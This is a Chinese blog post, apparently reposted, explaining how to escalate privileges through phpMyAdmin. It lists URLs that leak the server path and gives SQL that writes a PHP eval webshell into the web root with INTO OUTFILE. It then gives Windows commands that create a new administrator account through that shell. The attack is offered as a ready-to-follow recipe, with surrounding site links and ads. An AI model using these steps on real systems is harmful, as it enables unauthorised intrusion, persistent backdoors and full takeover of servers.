怎么利用phpMyAdmin提权

PHP中文网 数据库

本文摘自PHP中文网,作者藏色散人,侵删。

下面由phpmyadmin教程栏目给大家介绍利用phpMyAdmin提权的方法,希望对需要的朋友有所帮助!

利用phpMyAdmin提权

爆路径

  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpMyAdmin/index.php?lang[]=1
  • /phpMyAdmin/phpinfo.php
  • /load_file()
  • /phpmyadmin/themes/darkblue_orange/layout.inc.php
  • /phpmyadmin/libraries/select_lang.lib.php
  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpmyadmin/libraries/mcrypt.lib.php

得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php

写马

1

2

3

4

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");

select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";

Drop TABLE IF EXISTS a;

获得webshell

最后用Cknife连接,创建帐户并添加到管理员用户组
net user admin admin /add
net localgroup administrator admin /add

以上就是怎么利用phpMyAdmin提权的详细内容,更多文章请关注木庄网络博客

相关阅读 >>

无法打开phpMyAdmin怎么办

wamp中怎么升级phpMyAdmin版本

phpMyAdmin如何设置字段属性

phpMyAdmin如何导入xls

如何设置外网无法访问phpMyAdmin

phpMyAdmin导入sql文件失败怎么办?

phpMyAdmin用户名乱码怎么办

如何使用phpMyAdmin远程连接数据库

phpMyAdmin怎么修改数据库root密码

使用phpMyAdmin怎样修改mysql密码

更多相关阅读请进入《phpMyAdmin》频道 >>


数据库系统概念 第6版
书籍

数据库系统概念 第6版

机械工业出版社

本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。



标签:

打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

相关推荐

评论

管理员已关闭评论功能...